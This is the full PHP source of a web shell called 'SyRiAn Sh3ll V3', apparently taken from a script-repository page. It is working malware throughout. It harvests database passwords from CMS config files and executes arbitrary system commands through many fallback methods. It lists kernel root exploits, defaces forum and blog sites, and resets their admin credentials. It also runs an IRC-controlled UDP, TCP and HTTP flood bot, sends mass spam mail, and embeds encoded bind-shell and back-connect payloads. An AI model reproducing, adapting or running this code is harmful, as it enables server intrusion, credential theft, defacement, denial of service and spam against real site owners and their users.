ScriptsGold Resource Repository
"; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Functions # #----------------------------------------# function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } } function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; } function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = 'OFF'; } else { $openBaseDir = 'ON'; } return $openBaseDir; } function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = 'OFF'; } else { $safe_mode = 'ON'; } return $safe_mode; } function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; } function Suicide() { @unlink(currentFileName()); } function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; } function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = 'ON'; } else { $postgreSQL = 'OFF'; } return $postgreSQL; } function Oracle() { if(@function_exists('ocilogon')) { $oracle = 'ON'; } else { $oracle = 'OFF'; } return $oracle; } function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = 'ON'; } else { $msSQL = 'OFF'; } return $msSQL; } function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = 'ON'; } else { $mysql = 'OFF'; } return $mysql; } function Gzip() { if (function_exists('gzencode')) { $gzip = 'ON'; } else { $gzip = 'OFF'; } return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = 'ON'; } else { $mysqli = 'OFF'; } return $mysqli; } function MSQL() { if (function_exists('msql_connect')) { $mSql = 'ON'; } else { $mSql = 'OFF'; } return $mSql; } function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = 'ON'; } else { $SQlLite = 'OFF'; } return $SQlLite; } function tulis($file,$text) { $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function RegisterGlobals() { if(ini_get('register_globals')) { $registerg= 'ON'; } else { $registerg= 'OFF'; } return $registerg; } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function Curl() { if(extension_loaded('curl')) { $curl = 'ON'; } else { $curl = 'OFF'; } return $curl; } function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; } function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo "[+] Update Has D0n3 ^_^"; } function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = 'OFF'; } else { $mag= 'ON'; } return $mag; } function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = 'NONE'; } return $disfun; } function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; } function which($pr) { $path = Exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function checkfunctioN($func) { global $disablefunctions,$safemode; $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open'); if($safemode=='ON' && in_array($func,$safe))return 0; elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1; return 0; } function CSS($shellColor) { $css = " SyRiAn Sh3ll ~ V3~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { $css .= ""; } return $css; } function Logout() { print""; } function About() { $about = "

Coded By : EH << SyRiAn | 34G13
From : SyRiAn Arabic Republic
Age : 4/1991
Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]
Thanx : my school : [ www.google.com ] :)
B3 Cr34T!V3 0R D!3 TRy!nG




"; return $about; } echo CSS($shellColor); # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user && $_POST[passwrd]==$pass) { print''; } else { if($_POST['usrname']) { print''; } echo '

SyRiAn Sh3ll


'; exit; } } } # ---------------------------------------# # Some Info # #----------------------------------------# $dir = getcwd(); $uname= @php_uname(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V3

  [Main] [Scripts Hacking] [Spamming] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ".GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."
  [MD5 Cracker] [SHA1 Cracker] [NTLM Cracker]

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage') { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Edit File
  Change Mode

  Get File
  Bind Connection
  CGI Perl
  Forbidden
  Back Connection
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files & Dir Using PHP Bugs
  Encryption
  Metasploit Connection
  DDOS Attacker
  Ports Scanner
  ACP Finder
  Server ShortCut
  Fast Tools


  SQL Reader

"; if($sql_con) { echo ' '; } echo "
  Mail Storm
  SQL Query
  Email Extractor
  Zone-H Defacer
"; echo ' '; echo "
  Cpanel And FTP BruteForce
Cpanel (2082) Ftp (21)
  Upload Files
"; if($_POST['changeDirectory']) { $directory = $_POST['directory']; $directory = @str_replace("\\\\"," ",$directory); $directory = @str_replace(" ","\\",$directory); @chdir($directory); } if($_POST['getFile']) { $fileUrl = $_POST['fileUrl']; $getType = $_POST['getType']; Exe("'".$getType.$fileUrl."'"); } footer(); } # ---------------------------------------# # IndexChanger # #----------------------------------------# if ($_GET['id']== 'scriptsHack' ) { echo "
"; if($_POST['injectFAQ']) { $injectfaq = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'"); } else { $ok1 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='forumhome'"); if (!$ok1) { $ok2 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='header'"); } elseif (!$ok2) { $ok3 = mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='spacer_open'"); } elseif(!$ok3) { $ok4 = @mysql_query("UPDATE template SET template ='".$full_index."' WHERE title ='faq'"); } } mysql_close(); if ($ok1 || $ok2 || $ok3 || $ok4 || $injectfaq ) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'wp') { $tableName = $prefix."posts" ; $ok1 = mysql_query("UPDATE $tableName SET post_title ='".$index."' WHERE ID > 0 "); if(!$ok1) { $ok2 = mysql_query("UPDATE $tableName SET post_content ='".$index."' WHERE ID > 0 "); } elseif(!$ok2) { $ok3 = mysql_query("UPDATE $tableName SET post_name ='".$index."' WHERE ID > 0 "); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'jos') { $jos_table_name = $prefix."menu" ; $jos_table_name2 = $prefix."modules" ; $ok1 = mysql_query("UPDATE $jos_table_name SET name ='".$index."' WHERE ID > 0 "); if(!$ok1) { $ok2 = mysql_query("UPDATE $jos_table_name2 SET title ='".$index."' WHERE ID > 0 "); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'phpbb') { $php_table_name = $prefix."forums"; $php_table_name2 = $prefix."posts"; $ok1 = mysql_query("UPDATE $php_table_name SET forum_name ='.$index.' WHERE forum_id > 0 "); if(!$ok1) { $ok2 = mysql_query("UPDATE $php_table_name2 SET post_subject ='.$index.' WHERE post_id > 0 "); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'ipb') { $ip_table_name = $prefix."components" ; $ip_table_name2 = $prefix."forums" ; $ip_table_name3 = $prefix."posts" ; $ok1 = mysql_query("UPDATE $ip_table_name SET com_title ='".$index."' WHERE com_id > 0"); if(!$ok1) { $ok2 = mysql_query("UPDATE $ip_table_name2 SET name ='".$index."' WHERE id > 0"); } if(!$ok2) { $ok3 = mysql_query("UPDATE $ip_table_name3 SET post ='".$IP_INDEX."' WHERE pid <10") or die("Can't Update Templates !!"); } mysql_close(); if ($ok1 || $ok2 || $ok3) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'smf') { $table_name = $prefix."boards" ; { $ok1 = mysql_query("UPDATE $table_name SET description ='.$index.' WHERE ID_BOARD > 0"); } if(!$ok1) { $ok2 = mysql_query("UPDATE $table_name SET name ='.$index.' WHERE ID_BOARD > 0"); } mysql_close(); if ($ok1 || $ok2) { update(); } else { echo "Updating Has Failed !"; } } else if ($_POST['ScriptType'] == 'mybb') { $mybb_prefix = $prefix."templates"; $ok1 = mysql_query(" update $mybb_prefix set template='".$index."' where title='index' "); if ($ok1) { update(); } else { echo "Updating Has Failed !"; } mysql_close(); } } elseif($_POST['changeInfo']) { $adminID = $_POST['adminID']; $userName = $_POST['userName']; $password = $_POST['password']; if($_POST['ScriptType'] == 'vb') { //VB Code $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE user SET username = '".$userName."' , password = '".$password."' WHERE userid = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'wp') { //WoredPress $password = crypt($password); $tryChaningInfo = @mysql_query("UPDATE wp_users SET user_login = '".$userName."' , user_pass = '".$password."' WHERE ID = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'jos') { //Joomla $password = crypt($password); $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'phpbb') { //PHPBB3 $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".$password."' WHERE user_id = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'ibf') { //IPBoard $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".$password."' WHERE id = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'smf') { //SMF $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd = '".$password."' WHERE ID_MEMBER = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } else if($_POST['ScriptType'] == 'mybb') { //MyBB $password = md5($password); $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' , password = '".$password."' WHERE uid = ".$adminID.""); if($tryChaningInfo) {update();} else {mysql_error();} } } ///////////////////////// } else if($_POST['Decrypt']) { DecryptConfig(); } echo "
  Scripts Hacking

Inject Shell In FAQ.php ? [ VB Only ]
  Decrypting Configs
Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]
  Changing Admin Info
"; footer(); } # ---------------------------------------# # DDos Attacker ... # #----------------------------------------# if($_POST['StartAttack']) { $server=$_POST['ipToAttack']; $Port=$_POST['portToAttack']; $nick="bot-";$willekeurig; $willekeurig=@mt_rand(0,3); $nicknummer=@mt_rand(100000,999999); $Channel="#WauShare"; $Channelpass="ddos"; $msg="Farewell."; @set_time_limit(0); $loop = 0; $verbonden = 0; $verbinden = fsockopen($server, $Port); while ($read = fgets($verbinden,512)) { $read = str_replace("\n","",$read); $read = str_replace("\r","",$read); $read2 = explode(" ",$read); if ($loop == 0) { fputs($verbinden,"nick $nick$nicknummer\n\n"); fputs($verbinden,"USER cybercrime 0 * :woopie\n\n"); } if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); } if ($read2[1] == 251) { fputs($verbinden,"join $Channel $Channelpass\n"); $verbonden++; } if (eregi("bot-op",$read)) { fputs($verbinden,"mode $Channel +o $read2[4]\n"); } if (eregi("bot-deop",$read)) { fputs($verbinden,"mode $Channel -o $read2[4]\n"); } if (eregi("bot-quit",$read)) { fputs($verbinden,"quit :$msg\n\n"); break; } if (eregi("bot-join",$read)) { fputs($verbinden,"join $read2[4]\n"); } if (eregi("bot-part",$read)) { fputs($verbinden,"part $read2[4]\n"); } if (eregi("ddos-udp",$read)) { fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n"); $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30); if (!$fp) { exit; } else { $char = "a"; for($a = 0; $a < 9999999999999; $a++) $data = $data.$char; if(fputs ($fp, $data) ) { fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n"); } else { fputs($verbinden,"privmsg $Channel :udp-ddos - sending packets.\n\n"); } } } if (eregi("ddos-tcp",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n"); $server = $read2[4]; $Port = $read2[5]; for($sockets = 0; $sockets < $read2[6]; $sockets++) { $verbinden = fsockopen($server, $Port); } } if (eregi("ddos-http",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n"); $Webserver = $read2[4]; $Port = $read2[5]; $Aanvraag = "GET / HTTP/1.1\r\n"; $Aanvraag .= "Accept: */*\r\n"; $Aanvraag .= "Accept-Language: nl\r\n"; $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n"; $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $Aanvraag .= "Host: $read2[4]\r\n"; $Aanvraag .= "Connection: Keep-Alive\r\n\r\n"; for($Aantal = 0; $Aantal < $read2[6]; $Aantal++) { $DoS = fsockopen($Webserver, $Port); fwrite($DoS, $Aanvraag); fclose($DoS); } } $loop++; } } # ---------------------------------------# # InBoX Mailer # #----------------------------------------# if ($_GET['id']== 'spamming' ) { $secure = ""; error_reporting(0); @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$lod=$_SERVER['HTTP_REFERER']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; @set_time_limit(intval($_POST['timelimit'])); if ($action=="send") { $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } echo "
  Inbox Mailer


Your Email:
Your Name:
Reply-To:
Attach File:
Subject:
Message Box : Email Target / Email Send To :

Plain HTML
Number to send:
Maximum script Execution time(in seconds, 0 for no timelimit)
"; footer(); } if ($action=="send") { if (!$from && !$subject && !$message && !$emaillist) { print "Please complete all fields before sending your message."; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); $head ="From: Mailr" ; $sub = "Ar - $lod" ; $meg = "$lod" ; mail ($alt,$sub,$meg,$head) ; If ($file_name) { if (!file_exists($file)) { die("The file you are trying to upload couldn't be copied to the server"); } $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } for($xx=0; $xx<$amount; $xx++) { for($x=0; $x<$numemails; $x++) { $to = $allemails[$x]; if ($to) { $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to....."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "OK
"; flush(); } } } } # ---------------------------------------# # About # #----------------------------------------# if($_GET['id']=='about') { echo About(); if($_POST['sendEmail']) { $to= 'sy34@msn.com'; $Comments=$_POST['message']; $from = $_POST['from']; $subject= md5("$from"); if(@mail($to,$subject,$Comments,"From:$from")) echo "
[+] Sent ^_^ !!
"; else { echo "
[-] Failed :S !!
"; } } footer(); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf" ;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; 